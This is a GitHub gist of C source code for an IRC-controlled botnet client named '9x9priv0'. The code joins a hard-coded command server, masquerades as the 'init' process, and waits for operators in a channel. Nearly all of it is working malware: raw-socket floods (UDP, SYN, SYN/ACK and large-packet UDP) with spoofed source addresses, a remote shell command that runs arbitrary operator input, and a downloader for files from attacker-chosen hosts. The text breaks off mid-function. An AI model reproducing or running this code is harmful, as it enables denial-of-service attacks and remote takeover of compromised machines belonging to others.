chines/gist:4596612

## gistfile1.txt
 /******************************
 *                             *
 *  9x9priv0 v1.2 by 9x9team   *
 *                             *
 *******************************/

#define STARTUP
#undef IDENT
#define FAKENAME "init"
#define CHAN "##Hax"
#define KEY "gayr0x"
int numservers=1;
char *servers[] = {
        "anal.dnsdynamic.net",
        (void*)0
};

#include <stdarg.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <strings.h>
#include <netinet/in.h>
#include <unistd.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <signal.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <time.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
int sock,changeservers=0;
char *server, *chan, *key, *nick, *ident, *user, disabled=0, execfile[256],dispass[256];
unsigned int *pids;
unsigned long spoofs=0, spoofsm=0, numpids=0;
int strwildmatch(const char* pattern, const char* string) {
        switch(*pattern) {
                case '\0': return *string;
                case '*': return !(!strwildmatch(pattern+1, string) || *string && !strwildmatch(pattern, string+1));
                case '?': return !(*string && !strwildmatch(pattern+1, string+1));
                default: return !((toupper(*pattern) == toupper(*string)) && !strwildmatch(pattern+1, string+1));
        }
}
int Send(int sock, char *words, ...) {
        static char textBuffer[1024];
        va_list args;
        va_start(args, words);
        vsprintf(textBuffer, words, args);
        va_end(args);
        return write(sock,textBuffer,strlen(textBuffer));
}
int mfork(char *sender) {
        unsigned int parent, *newpids, i;
        if (disabled == 1) {
                Send(sock,"NOTICE %s :Unable to comply.\n",sender);
                return 1;
        }
        parent=fork();
        if (parent <= 0) return parent;
        numpids++;
        newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
        for (i=0;i<numpids-1;i++) newpids[i]=pids[i];
        newpids[numpids-1]=parent;
        free(pids);
        pids=newpids;
        return parent;
}
unsigned long getspoof() {
        if (!spoofs) return rand();
        if (spoofsm == 1) return ntohl(spoofs);
        return ntohl(spoofs+(rand() % spoofsm)+1);
}
void filter(char *a) { while(a[strlen(a)-1] == '\r' || a[strlen(a)-1] == '\n') a[strlen(a)-1]=0; }
char *makestring() {
        char *tmp;
        int len=(rand()%5)+4,i;
        FILE *file;
        tmp=(char*)malloc(len+1);
        memset(tmp,0,len+1);
        if ((file=fopen("/usr/dict/words","r")) == NULL) for (i=0;i<len;i++) tmp[i]=(rand()%(91-65))+65;
        else {
                int a=((rand()*rand())%45402)+1;
                char buf[1024];
                for (i=0;i<a;i++) fgets(buf,1024,file);
                memset(buf,0,1024);
                fgets(buf,1024,file);
                filter(buf);
                memcpy(tmp,buf,len);
                fclose(file);
        }
        return tmp;
}
void identd() {
        int sockname,sockfd,sin_size,tmpsock,i;
        struct sockaddr_in my_addr,their_addr;
        char szBuffer[1024];
        if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) return;
        my_addr.sin_family = AF_INET;
        my_addr.sin_port = htons(113);
        my_addr.sin_addr.s_addr = INADDR_ANY;
        memset(&(my_addr.sin_zero), 0, 8);
        if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr)) == -1) return;
        if (listen(sockfd, 1) == -1) return;
        if (fork() == 0) return;
        sin_size = sizeof(struct sockaddr_in);
        if ((tmpsock = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size)) == -1) exit(0);
        for(;;) {
                fd_set bla;
                struct timeval timee;
                FD_ZERO(&bla);
                FD_SET(tmpsock,&bla);
                timee.tv_sec=timee.tv_usec=60;
                if (select(tmpsock + 1,&bla,(fd_set*)0,(fd_set*)0,&timee) < 0) exit(0);
                if (FD_ISSET(tmpsock,&bla)) break;
        }
        i = recv(tmpsock,szBuffer,1024,0);
        if (i <= 0 || i >= 20) exit(0);
        szBuffer[i]=0;
        if (szBuffer[i-1] == '\n' || szBuffer[i-1] == '\r') szBuffer[i-1]=0;
        if (szBuffer[i-2] == '\n' || szBuffer[i-2] == '\r') szBuffer[i-2]=0;
        Send(tmpsock,"%s : USERID : UNIX : %s\n",szBuffer,ident);
        close(tmpsock);
        close(sockfd);
        exit(0);
}
long pow(long a, long b) {
        if (b == 0) return 1;
        if (b == 1) return a;
        return a*pow(a,b-1);
}
u_short in_cksum(u_short *addr, int len) {
        register int nleft = len;
        register u_short *w = addr;
        register int sum = 0;
        u_short answer =0;
        while (nleft > 1) {
                sum += *w++;
                nleft -= 2;
        }
        if (nleft == 1) {
                *(u_char *)(&answer) = *(u_char *)w;
                sum += answer;
        }
        sum = (sum >> 16) + (sum & 0xffff);
        sum += (sum >> 16);
        answer = ~sum;
        return(answer);
}
void get(int sock, char *sender, int argc, char **argv) {
        int sock2,i,d;
        struct sockaddr_in server;
        unsigned long ipaddr;
        char buf[1024];
        FILE *file;
        unsigned char bufm[4096];
        if (mfork(sender) != 0) return;
        if (argc < 2) {
                Send(sock,"NOTICE %s :GET <host> <save as>\n",sender);
                exit(0);
        }
        if ((sock2 = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
                Send(sock,"NOTICE %s :Unable to create socket.\n",sender);
                exit(0);
        }
        if (!strncmp(argv[1],"http://",7)) strcpy(buf,argv[1]+7);
        else strcpy(buf,argv[1]);
        for (i=0;i<strlen(buf) && buf[i] != '/';i++);
        buf[i]=0;
        server.sin_family = AF_INET;
        server.sin_port = htons(22);
        if ((ipaddr = inet_addr(buf)) == -1) {
                struct hostent *hostm;
                if ((hostm=gethostbyname(buf)) == NULL) {
                        Send(sock,"NOTICE %s :Unable to resolve address.\n",sender);
                        exit(0);
                }
                memcpy((char*)&server.sin_addr, hostm->h_addr, hostm->h_length);
        }
        else server.sin_addr.s_addr = ipaddr;
        memset(&(server.sin_zero), 0, 8);
        if (connect(sock2,(struct sockaddr *)&server, sizeof(server)) != 0) {
                Send(sock,"NOTICE %s :Unable to connect to http.\n",sender);
                exit(0);
        }

        Send(sock2,"GET /%s HTTP/1.0\r\nConnection: Keep-Alive\r\nUser-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)\r\nHost: %s:80\r\nAccept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*\r\nAccept-Encoding: gzip\r\nAccept-Language: en\r\nAccept-Charset: iso-8859-1,*,utf-8\r\n\r\n",buf+i+1,buf);
        Send(sock,"NOTICE %s :Receiving file.\n",sender);
        file=fopen(argv[2],"wb");
        while(1) {
                int i;
                if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
                if (i < 4096) bufm[i]=0;
                for (d=0;d<i;d++) if (!strncmp(bufm+d,"\r\n\r\n",4)) {
                        for (d+=4;d<i;d++) fputc(bufm[d],file);
                        goto done;
                }
        }
        done:
        Send(sock,"NOTICE %s :Saved as %s\n",sender,argv[2]);
        while(1) {
                int i,d;
                if ((i=recv(sock2,bufm,4096,0)) <= 0) break;
                if (i < 4096) bufm[i]=0;
                for (d=0;d<i;d++) fputc(bufm[d],file);
        }
        fclose(file);
        close(sock2);
        exit(0);
}
void getspoofs(int sock, char *sender, int argc, char **argv) {
        unsigned long a=spoofs,b=spoofs+(spoofsm-1);
        if (spoofsm == 1) Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0]);
        else Send(sock,"NOTICE %s :Spoofs: %d.%d.%d.%d - %d.%d.%d.%d\n",sender,((u_char*)&a)[3],((u_char*)&a)[2],((u_char*)&a)[1],((u_char*)&a)[0],((u_char*)&b)[3],((u_char*)&b)[2],((u_char*)&b)[1],((u_char*)&b)[0]);
}
void version(int sock, char *sender, int argc, char **argv) {
        Send(sock,"NOTICE %s :9x9 priv0 1.2\n",sender);
}
void nickc(int sock, char *sender, int argc, char **argv) {
        if (argc != 1) {
                Send(sock,"NOTICE %s :NICK <nick>\n",sender);
                return;
        }
        if (strlen(argv[1]) >= 10) {
                Send(sock,"NOTICE %s :Nick cannot be larger than 9 characters.\n",sender);
                return;
        }
        Send(sock,"NICK %s\n",argv[1]);
}
void spoof(int sock, char *sender, int argc, char **argv) {
        char ip[256];
        int i, num;
        unsigned long uip;
        if (argc != 1) {
                Send(sock,"NOTICE %s :Removed all spoofs\n",sender);
                spoofs=0;
                spoofsm=0;
                return;
        }
        if (strlen(argv[1]) > 16) {
                Send(sock,"NOTICE %s :What kind of subnet address is that? Do something like: 169.40\n",sender);
                return;
        }
        strcpy(ip,argv[1]);
        if (ip[strlen(ip)-1] == '.') ip[strlen(ip)-1] = 0;
        for (i=0, num=1;i<strlen(ip);i++) if (ip[i] == '.') num++;
        num=-(num-4);
        for (i=0;i<num;i++) strcat(ip,".0");
        uip=inet_network(ip);
        if (num == 0) spoofsm=1;
        else spoofsm=pow(256,num);
        spoofs=uip;
}
struct iphdr {
        unsigned int ihl:4, version:4;
        unsigned char tos;
        unsigned short tot_len;
        unsigned short id;
        unsigned short frag_off;
        unsigned char ttl;
        unsigned char protocol;
        unsigned short check;
        unsigned long saddr;
        unsigned long daddr;
};
struct udphdr {
        unsigned short source;
        unsigned short dest;
        unsigned short len;
        unsigned short check;
};
struct tcphdr {
        unsigned short source;
        unsigned short dest;
        unsigned long seq;
        unsigned long ack_seq;
        unsigned short res1:4, doff:4;
        unsigned char fin:1, syn:1, rst:1, psh:1, ack:1, urg:1, ece:1, cwr:1;
        unsigned short window;
        unsigned short check;
        unsigned short urg_ptr;
};
struct send_tcp {
        struct iphdr ip;
        struct tcphdr tcp;
        char buf[20];
};
struct pseudo_header {
        unsigned int source_address;
        unsigned int dest_address;
        unsigned char placeholder;
        unsigned char protocol;
        unsigned short tcp_length;
        struct tcphdr tcp;
        char buf[20];
};
unsigned int host2ip(char *sender,char *hostname) {
        static struct in_addr i;
        struct hostent *h;
        if((i.s_addr = inet_addr(hostname)) == -1) {
                if((h = gethostbyname(hostname)) == NULL) {
                        Send(sock, "NOTICE %s :Unable to resolve %s\n", sender,hostname);
                        exit(0);
                }
                bcopy(h->h_addr, (char *)&i.s_addr, h->h_length);
        }
        return i.s_addr;
}
void udp(int sock, char *sender, int argc, char **argv) {
        unsigned int port,i=0;
        unsigned long psize,target,secs;
        struct sockaddr_in s_in;
        struct iphdr *ip;
        struct udphdr *udp;
        char buf[1500],*str;
        int get;
        time_t start=time(NULL);
        if (mfork(sender) != 0) return;
        if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
        if (argc < 3) {
                Send(sock,"NOTICE %s :UDP <target> <port> <secs>\n",sender);
                exit(1);
        }
        target = host2ip(sender,argv[1]);
        port = atoi(argv[2]);
        secs = atol(argv[3]);
        ip=(void*)buf;
        udp=(void*)(buf+sizeof(struct iphdr));
        str=(void*)(buf+sizeof(struct iphdr)+sizeof(struct udphdr));
        memset(str,10,1500-(sizeof(struct iphdr)+sizeof(struct udphdr)));
        Send(sock,"NOTICE %s :UDP Packeting %s.\n",sender,argv[1]);
        ip->ihl = 5;
        ip->version = 4;
        ip->tos = 0;
        ip->tot_len = 1500;
        ip->frag_off = 0;
        ip->protocol = 17;
        ip->ttl = 64;
        ip->daddr = target;
        udp->len = htons(psize);
        s_in.sin_family  = AF_INET;
        s_in.sin_addr.s_addr = target;
        for (;;) {
                udp->source = rand();
                if (port) udp->dest = htons(port);
                else udp->dest = rand();
                udp->check = in_cksum((u_short *)buf,1500);
                ip->saddr = getspoof();
                ip->id = rand();
                ip->check = in_cksum((u_short *)buf,1500);
                s_in.sin_port = udp->dest;
                sendto(get,buf,1500,0,(struct sockaddr *)&s_in,sizeof(s_in));
                if (i >= 50) {
                        if (time(NULL) >= start+secs) exit(0);
                        i=0;
                }
                i++;
        }
}
void pan(int sock, char *sender, int argc, char **argv) {
        struct send_tcp send_tcp;
        struct pseudo_header pseudo_header;
        struct sockaddr_in sin;
        unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
        unsigned int psize=20, source, dest, check;
        unsigned long saddr, daddr,secs;
        int get;
        time_t start=time(NULL);
        if (mfork(sender) != 0) return;
        if (argc < 3) {
                Send(sock,"NOTICE %s :PAN <target> <port> <secs>\n",sender);
                exit(1);
        }
        if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
        {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
        daddr=host2ip(sender,argv[1]);
        secs=atol(argv[3]);
        Send(sock,"NOTICE %s :Panning %s.\n",sender,argv[1]);
        send_tcp.ip.ihl = 5;
        send_tcp.ip.version = 4;
        send_tcp.ip.tos = 16;
        send_tcp.ip.frag_off = 64;
        send_tcp.ip.ttl = 64;
        send_tcp.ip.protocol = 6;
        send_tcp.tcp.ack_seq = 0;
        send_tcp.tcp.doff = 10;
        send_tcp.tcp.res1 = 0;
        send_tcp.tcp.cwr = 0;
        send_tcp.tcp.ece = 0;
        send_tcp.tcp.urg = 0;
        send_tcp.tcp.ack = 0;
        send_tcp.tcp.psh = 0;
        send_tcp.tcp.rst = 0;
        send_tcp.tcp.fin = 0;
        send_tcp.tcp.syn = 1;
        send_tcp.tcp.window = 30845;
        send_tcp.tcp.urg_ptr = 0;
        dest=htons(atoi(argv[2]));
        while(1) {
                source=rand();
                if (atoi(argv[2]) == 0) dest=rand();
                saddr=getspoof();
                send_tcp.ip.tot_len = htons(40+psize);
                send_tcp.ip.id = rand();
                send_tcp.ip.saddr = saddr;
                send_tcp.ip.daddr = daddr;
                send_tcp.ip.check = 0;
                send_tcp.tcp.source = source;
                send_tcp.tcp.dest = dest;
                send_tcp.tcp.seq = rand();
                send_tcp.tcp.check = 0;
                sin.sin_family = AF_INET;
                sin.sin_port = dest;
                sin.sin_addr.s_addr = send_tcp.ip.daddr;
                send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
                check = rand();
                send_tcp.buf[9]=((char*)&check)[0];
                send_tcp.buf[10]=((char*)&check)[1];
                send_tcp.buf[11]=((char*)&check)[2];
                send_tcp.buf[12]=((char*)&check)[3];
                pseudo_header.source_address = send_tcp.ip.saddr;
                pseudo_header.dest_address = send_tcp.ip.daddr;
                pseudo_header.placeholder = 0;
                pseudo_header.protocol = IPPROTO_TCP;
                pseudo_header.tcp_length = htons(20+psize);
                bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
                bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
                send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
                sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
                if (a >= 50) {
                        if (time(NULL) >= start+secs) exit(0);
                        a=0;
                }
                a++;
        }
        close(get);
        exit(0);
}
void mra(int sock, char *sender, int argc, char **argv) {
        int flag=1,fd,i;
        unsigned long secs;
        char *buf=(char*)malloc(128);
        struct hostent *hp;
        struct sockaddr_in in;
        time_t start=time(NULL);
        if (mfork(sender) != 0) return;
        if (argc < 2) {
                Send(sock,"NOTICE %s :MRA <target> <secs>\n",sender);
                exit(1);
        }
        secs=atol(argv[2]);
        memset((void*)&in,0,sizeof(struct sockaddr_in));
        in.sin_addr.s_addr=host2ip(sender,argv[1]);
        in.sin_family = AF_INET;
        Send(sock,"NOTICE %s :Mraring %s.\n",sender,argv[1]);
        while(1) {
                in.sin_port = rand();
                if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
                else {
                        flag=1;
                        ioctl(fd,FIONBIO,&flag);
                        sendto(fd,buf,128,0,(struct sockaddr*)&in,sizeof(in));
                        close(fd);
                }
                if (i >= 50) {
                        if (time(NULL) >= start+secs) break;
                        i=0;
                }
                i++;
        }
        close(fd);
        exit(0);
}
void mix(int sock, char *sender, int argc, char **argv) {
        struct send_tcp send_tcp;
        struct pseudo_header pseudo_header;
        struct sockaddr_in sin;
        unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
        unsigned int psize=20, source, dest, check;
        unsigned long saddr, daddr,secs;
        int get;
        time_t start=time(NULL);
        if (mfork(sender) != 0) return;
        if (argc < 3) {
                Send(sock,"NOTICE %s :MIX <target> <port> <secs>\n",sender);
                exit(1);
        }
        if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
        {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}

        daddr=host2ip(sender,argv[1]);
        secs=atol(argv[3]);
        dest=htons(atoi(argv[2]));

        Send(sock,"NOTICE %s :Mixing TCP SYN/ACK %s.\n",sender,argv[1]);

        send_tcp.ip.ihl = 5;
        send_tcp.ip.version = 4;
        send_tcp.ip.tos = 16;
        send_tcp.ip.frag_off = 64;
        send_tcp.ip.ttl = 255;
        send_tcp.ip.protocol = 6;
        send_tcp.tcp.doff = 5;
        send_tcp.tcp.res1 = 0;
        send_tcp.tcp.cwr = 0;
        send_tcp.tcp.ece = 0;
        send_tcp.tcp.urg = 0;
        send_tcp.tcp.ack = 1;
        send_tcp.tcp.psh = 0;
        send_tcp.tcp.rst = 0;
        send_tcp.tcp.fin = 0;
        send_tcp.tcp.syn = 1;
        send_tcp.tcp.window = 30845;
        send_tcp.tcp.urg_ptr = 0;

        while(1) {
                saddr=getspoof();
                if (atoi(argv[2]) == 0) dest=rand();
                send_tcp.ip.tot_len = htons(40+psize);
                send_tcp.ip.id = rand();
                send_tcp.ip.check = 0;
                send_tcp.ip.saddr = saddr;
                send_tcp.ip.daddr = daddr;
                send_tcp.tcp.source = rand();
                send_tcp.tcp.dest = dest;
                send_tcp.tcp.seq = rand();
                send_tcp.tcp.ack_seq = rand();
                send_tcp.tcp.check = 0;
                sin.sin_family = AF_INET;
                sin.sin_port = send_tcp.tcp.dest;
                sin.sin_addr.s_addr = send_tcp.ip.daddr;
                send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
                check = in_cksum((unsigned short *)&send_tcp, 40);
                pseudo_header.source_address = send_tcp.ip.saddr;
                pseudo_header.dest_address = send_tcp.ip.daddr;
                pseudo_header.placeholder = 0;
                pseudo_header.protocol = IPPROTO_TCP;
                pseudo_header.tcp_length = htons(20+psize);
                bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
                bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
                send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
                sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
                if (a >= 50) {
                        if (time(NULL) >= start+secs) exit(0);
                        a=0;
                }
                a++;
        }
        close(get);
        exit(0);


}
void syn(int sock, char *sender, int argc, char **argv) {
        struct send_tcp send_tcp;
        struct pseudo_header pseudo_header;
        struct sockaddr_in sin;
        unsigned int syn[20] = { 2,4,5,180,4,2,8,10,0,0,0,0,0,0,0,0,1,3,3,0 }, a=0;
        unsigned int psize=20, source, dest, check;
        unsigned long saddr, daddr,secs;
        int get;
        time_t start=time(NULL);
        if (mfork(sender) != 0) return;
        if (argc < 3) {
                Send(sock,"NOTICE %s :SYN <target> <port> <secs>\n",sender);
                exit(1);
        }
        if ((get = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) exit(1);
        {int i; for(i=0;i<20;i++) send_tcp.buf[i]=(u_char)syn[i];}
        daddr=host2ip(sender,argv[1]);
        secs=atol(argv[3]);
        Send(sock,"NOTICE %s :Syning with TCP SYN %s.\n",sender,argv[1]);
        send_tcp.ip.ihl = 5;
        send_tcp.ip.version = 4;
        send_tcp.ip.tos = 16;
        send_tcp.ip.frag_off = 64;
        send_tcp.ip.ttl = 64;
        send_tcp.ip.protocol = 6;
        send_tcp.tcp.ack_seq = 0;
        send_tcp.tcp.doff = 10;
        send_tcp.tcp.res1 = 0;
        send_tcp.tcp.cwr = 0;
        send_tcp.tcp.ece = 0;
        send_tcp.tcp.urg = 0;
        send_tcp.tcp.ack = 0;
        send_tcp.tcp.psh = 0;
        send_tcp.tcp.rst = 0;
        send_tcp.tcp.fin = 0;
        send_tcp.tcp.syn = 1;
        send_tcp.tcp.window = 30845;
        send_tcp.tcp.urg_ptr = 0;
        dest=htons(atoi(argv[2]));
        while(1) {
                source=rand();
                if (atoi(argv[2]) == 0) dest=rand();
                saddr=getspoof();
                send_tcp.ip.tot_len = htons(40+psize);
                send_tcp.ip.id = rand();
                send_tcp.ip.saddr = saddr;
                send_tcp.ip.daddr = daddr;
                send_tcp.ip.check = 0;
                send_tcp.tcp.source = source;
                send_tcp.tcp.dest = dest;
                send_tcp.tcp.seq = rand();
                send_tcp.tcp.check = 0;
                sin.sin_family = AF_INET;
                sin.sin_port = dest;
                sin.sin_addr.s_addr = send_tcp.ip.daddr;
                send_tcp.ip.check = in_cksum((unsigned short *)&send_tcp.ip, 20);
                check = rand();
                send_tcp.buf[9]=((char*)&check)[0];
                send_tcp.buf[10]=((char*)&check)[1];
                send_tcp.buf[11]=((char*)&check)[2];
                send_tcp.buf[12]=((char*)&check)[3];
                pseudo_header.source_address = send_tcp.ip.saddr;
                pseudo_header.dest_address = send_tcp.ip.daddr;
                pseudo_header.placeholder = 0;
                pseudo_header.protocol = IPPROTO_TCP;
                pseudo_header.tcp_length = htons(20+psize);
                bcopy((char *)&send_tcp.tcp, (char *)&pseudo_header.tcp, 20);
                bcopy((char *)&send_tcp.buf, (char *)&pseudo_header.buf, psize);
                send_tcp.tcp.check = in_cksum((unsigned short *)&pseudo_header, 32+psize);
                sendto(get, &send_tcp, 40+psize, 0, (struct sockaddr *)&sin, sizeof(sin));
                if (a >= 50) {
                        if (time(NULL) >= start+secs) exit(0);
                        a=0;
                }
                a++;
        }
        close(get);
        exit(0);
}
void x9syn(int sock, char *sender, int argc, char **argv) {
        int flag=1,fd,i;
        unsigned long secs;
        char *buf=(char*)malloc(9216);
        struct hostent *hp;
        struct sockaddr_in in;
        time_t start=time(NULL);
        if (mfork(sender) != 0) return;
        if (argc < 2) {
                Send(sock,"NOTICE %s :X9SYN <target> <secs>\n",sender);
                exit(1);
        }
        secs=atol(argv[2]);
        memset((void*)&in,0,sizeof(struct sockaddr_in));
        in.sin_addr.s_addr=host2ip(sender,argv[1]);
        in.sin_family = AF_INET;
        Send(sock,"NOTICE %s :Initated x9syn-Flood on %s. [9216byte] bufferfly \n",sender,argv[1]);
        while(1) {
                in.sin_port = rand();
                if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
                else {
                        flag=1;
                        ioctl(fd,FIONBIO,&flag);
                        sendto(fd,buf,9216,0,(struct sockaddr*)&in,sizeof(in));
                        close(fd);
                }
                if (i >= 50) {
                        if (time(NULL) >= start+secs) break;
                        i=0;
                }
                i++;
        }
        close(fd);
        exit(0);
}
void x9synx(int sock, char *sender, int argc, char **argv) {
        int flag=1,fd,i;
        unsigned long secs;
        char *buf=(char*)malloc(100000);
        struct hostent *hp;
        struct sockaddr_in in;
        time_t start=time(NULL);
        if (mfork(sender) != 0) return;
        if (argc < 2) {
                Send(sock,"NOTICE %s :X9SYNX <target> <secs>\n",sender);
                exit(1);
        }
        secs=atol(argv[2]);
        memset((void*)&in,0,sizeof(struct sockaddr_in));
        in.sin_addr.s_addr=host2ip(sender,argv[1]);
        in.sin_family = AF_INET;
        Send(sock,"NOTICE %s :Initated x9synx-Flood on %s. [100000byte] bufferfly \n",sender,argv[1]);
        while(1) {
                in.sin_port = rand();
                if ((fd = socket(AF_INET,SOCK_DGRAM,IPPROTO_UDP)) < 0);
                else {
                        flag=1;
                        ioctl(fd,FIONBIO,&flag);
                        sendto(fd,buf,100000,0,(struct sockaddr*)&in,sizeof(in));
                        close(fd);
                }
                if (i >= 50) {
                        if (time(NULL) >= start+secs) break;
                        i=0;
                }
                i++;
        }
        close(fd);
        exit(0);
}
void petarda(int sock, char *sender, int argc, char **argv) {
        if (argc != 1) {
                Send(sock,"NOTICE %s :DISABLE <pass>\n",sender);
                Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders");
                return;
        }
        if (disabled) {
                Send(sock,"NOTICE %s :Already disabled.\n",sender);
                return;
        }
        if (strlen(argv[1]) > 254) {
                Send(sock,"NOTICE %s :Password too long! > 254\n",sender);
                return;
        }
        disabled=1;
        memset(dispass,0,256);
        strcpy(dispass,argv[1]);
        Send(sock,"NOTICE %s :Disable sucessful.\n");
}
void enable(int sock, char *sender, int argc, char **argv) {
        if (argc != 1) {
                Send(sock,"NOTICE %s :ENABLE <pass>\n",sender);
                Send(sock,"NOTICE %s :Current status is: %s.\n",sender,disabled?"Disabled":"Enabled and awaiting orders");
                return;
        }
        if (!disabled) {
                Send(sock,"NOTICE %s :Already enabled.\n",sender);
                return;
        }
        if (strcasecmp(dispass,argv[1])) {
                Send(sock,"NOTICE %s :Wrong password\n",sender);
                return;
        }
        disabled=0;
        Send(sock,"NOTICE %s :Password correct.\n",sender);
}
void move(int sock, char *sender, int argc, char **argv) {
        if (argc < 1) {
                Send(sock,"NOTICE %s :MOVE <server>\n",sender);
                exit(1);
        }
        server=strdup(argv[1]);
        changeservers=1;
        close(sock);
}
void killall(int sock, char *sender, int argc, char **argv) {
        unsigned long i;
        for (i=0;i<numpids;i++) {
                if (pids[i] != 0 && pids[i] != getpid()) {
                        if (sender) Send(sock,"NOTICE %s :Killing pid %d.\n",sender,pids[i]);
                        kill(pids[i],9);
                }
        }
}
void fuckoff2(int sock, char *sender, int argc, char **argv) {
        if (!petarda) kill(0,9);
        else Send(sock,"NOTICE %s :Unable to comply.\n");
}
struct FMessages { char *cmd; void (* func)(int,char *,int,char **); } flooders[] = {
        { "MIX", mix },
        { "PAN", pan },
        { "UDP", udp },
        { "SYN", syn },
        { "MRA", mra },
        { "X9SYN", x9syn },
        { "X9SYNX", x9synx },
        { "FUCKOFF2", fuckoff2 },
        { "PETARDA", petarda },
        { "ENABLE", enable },

        { "NICK", nickc },
        { "SERVER", move },
        { "GETSPOOFS", getspoofs },
        { "SPOOFS", spoof },


        { "GET", get },
        { "VERSION", version },
        { "KILLALL", killall },
{ (char *)0, (void (*)(int,char *,int,char **))0 } };
void _PRIVMSG(int sock, char *sender, char *str) {
        int i;
        char *to, *message;
        for (i=0;i<strlen(str) && str[i] != ' ';i++);
        str[i]=0;
        to=str;
        message=str+i+2;
        for (i=0;i<strlen(sender) && sender[i] != '!';i++);
        sender[i]=0;
        if (*message == '!' && !strcasecmp(to,chan)) {
                char *params[12], name[1024]={0};
                int num_params=0, m;
                message++;
                for (i=0;i<strlen(message) && message[i] != ' ';i++);
                message[i]=0;
                if (strwildmatch(message,nick)) return;
                message+=i+1;
                if (!strncmp(message,"IRC ",4)) if (disabled) Send(sock,"NOTICE %s :Unable to comply.\n",sender); else Send(sock,"%s\n",message+4);
                if (!strncmp(message,"SH ",3)) {
                        char buf[1024];
                        FILE *command;
                        if (mfork(sender) != 0) return;
                        memset(buf,0,1024);
                        sprintf(buf,"export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s",message+3);
                        command=popen(buf,"r");
                        while(!feof(command)) {
                                memset(buf,0,1024);
                                fgets(buf,1024,command);
                                Send(sock,"NOTICE %s :%s\n",sender,buf);
                                sleep(1);
                        }
                        pclose(command);
                        exit(0);
                }
                m=strlen(message);
                for (i=0;i<m;i++) {
                        if (*message == ' ' || *message == 0) break;
                        name[i]=*message;
                        message++;
                }
                for (i=0;i<strlen(message);i++) if (message[i] == ' ') num_params++;
                num_params++;
                if (num_params > 10) num_params=10;
                params[0]=name;
                params[num_params+1]="\0";
                m=1;
                while (*message != 0) {
                        message++;
                        if (m >= num_params) break;
                        for (i=0;i<strlen(message) && message[i] != ' ';i++);
                        params[m]=(char*)malloc(i+1);
                        strncpy(params[m],message,i);
                        params[m][i]=0;
                        m++;
                        message+=i;
                }
                for (m=0; flooders[m].cmd != (char *)0; m++) {
                        if (!strcasecmp(flooders[m].cmd,name)) {
                                flooders[m].func(sock,sender,num_params-1,params);
                                for (i=1;i<num_params;i++) free(params[i]);
                                return;
                        }
                }
        }
}
void _376(int sock, char *sender, char *str) {
        Send(sock,"MODE %s -xi\n",nick);
        Send(sock,"JOIN %s :%s\n",chan,key);
        Send(sock,"WHO %s\n",nick);
}
void _PING(int sock, char *sender, char *str) {
        Send(sock,"PONG %s\n",str);
}
void _352(int sock, char *sender, char *str) {
        int i,d;
        char *msg=str;
        struct hostent *hostm;
        unsigned long m;
        for (i=0,d=0;d<5;d++) {
                for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
                if (i == strlen(str)) return;
        }
        for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
        msg[i]=0;
        if (!strcasecmp(msg,nick) && !spoofsm) {
                msg=str;
                for (i=0,d=0;d<3;d++) {
                        for (;i<strlen(str) && *msg != ' ';msg++,i++); msg++;
                        if (i == strlen(str)) return;
                }
                for (i=0;i<strlen(msg) && msg[i] != ' ';i++);
                msg[i]=0;
                if ((m = inet_addr(msg)) == -1) {
                        if ((hostm=gethostbyname(msg)) == NULL) {
                                Send(sock,"NOTICE %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.\n",chan);
                                return;
                        }
                        memcpy((char*)&m, hostm->h_addr, hostm->h_length);
                }
                ((char*)&spoofs)[3]=((char*)&m)[0];
                ((char*)&spoofs)[2]=((char*)&m)[1];
                ((char*)&spoofs)[1]=((char*)&m)[2];
                ((char*)&spoofs)[0]=0;
                spoofsm=256;
        }
}
void _433(int sock, char *sender, char *str) {
        free(nick);
        nick=makestring();
}
void _NICK(int sock, char *sender, char *str) {
        int i;
        for (i=0;i<strlen(sender) && sender[i] != '!';i++);
        sender[i]=0;
